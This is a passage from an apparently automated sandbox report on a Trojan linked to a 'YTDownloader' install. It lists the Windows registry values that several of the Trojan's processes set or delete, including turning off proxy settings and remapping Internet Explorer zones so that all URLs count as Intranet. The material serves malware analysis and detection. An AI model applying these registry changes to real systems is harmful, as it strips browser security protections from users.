"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 44 87 2E 28 E4 5B B9 56 2E 68 77 0B 3C C8 AB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process %original file name%.exe:1076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 79 97 D5 E6 D6 FF F2 0F 48 EB A0 9B 27 3A 5E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web nodes that have no dots in their names and do not belong to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 51 39 33 ED B3 CF 70 EB 00 6A 1C 73 B3 3E F1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B DA 21 B9 45 74 85 75 F1 16 13 81 E9 62 BD 98"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"My Video" = ""

[HKLM\SOFTWARE\YTDownloader\Success]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\YTDownloader\Success]
"InstallStr" = "ok"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 59 F2 B2 88 1A 83 9F 3C C2 CC D1 45 0B 24 9F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 93 CF 2F D6 90 FB 6E 5F 90 8A 98 52 B8 B3 D4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ins_sense.exe:2100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 80 55 AF C3 0B E8 CD FA C9 F7 9E 2B B5 E4 37"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"9ba9693.exe" = "9ba9693"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The process sc.exe:2344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 90 E8 3D 34 A1 66 55 D1 1B 38 92 26 8C 80 5F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process sc.exe:3936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 8E 36 EF 8A 90 86 7B BD FA 10 21 2C F6 7D 2C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
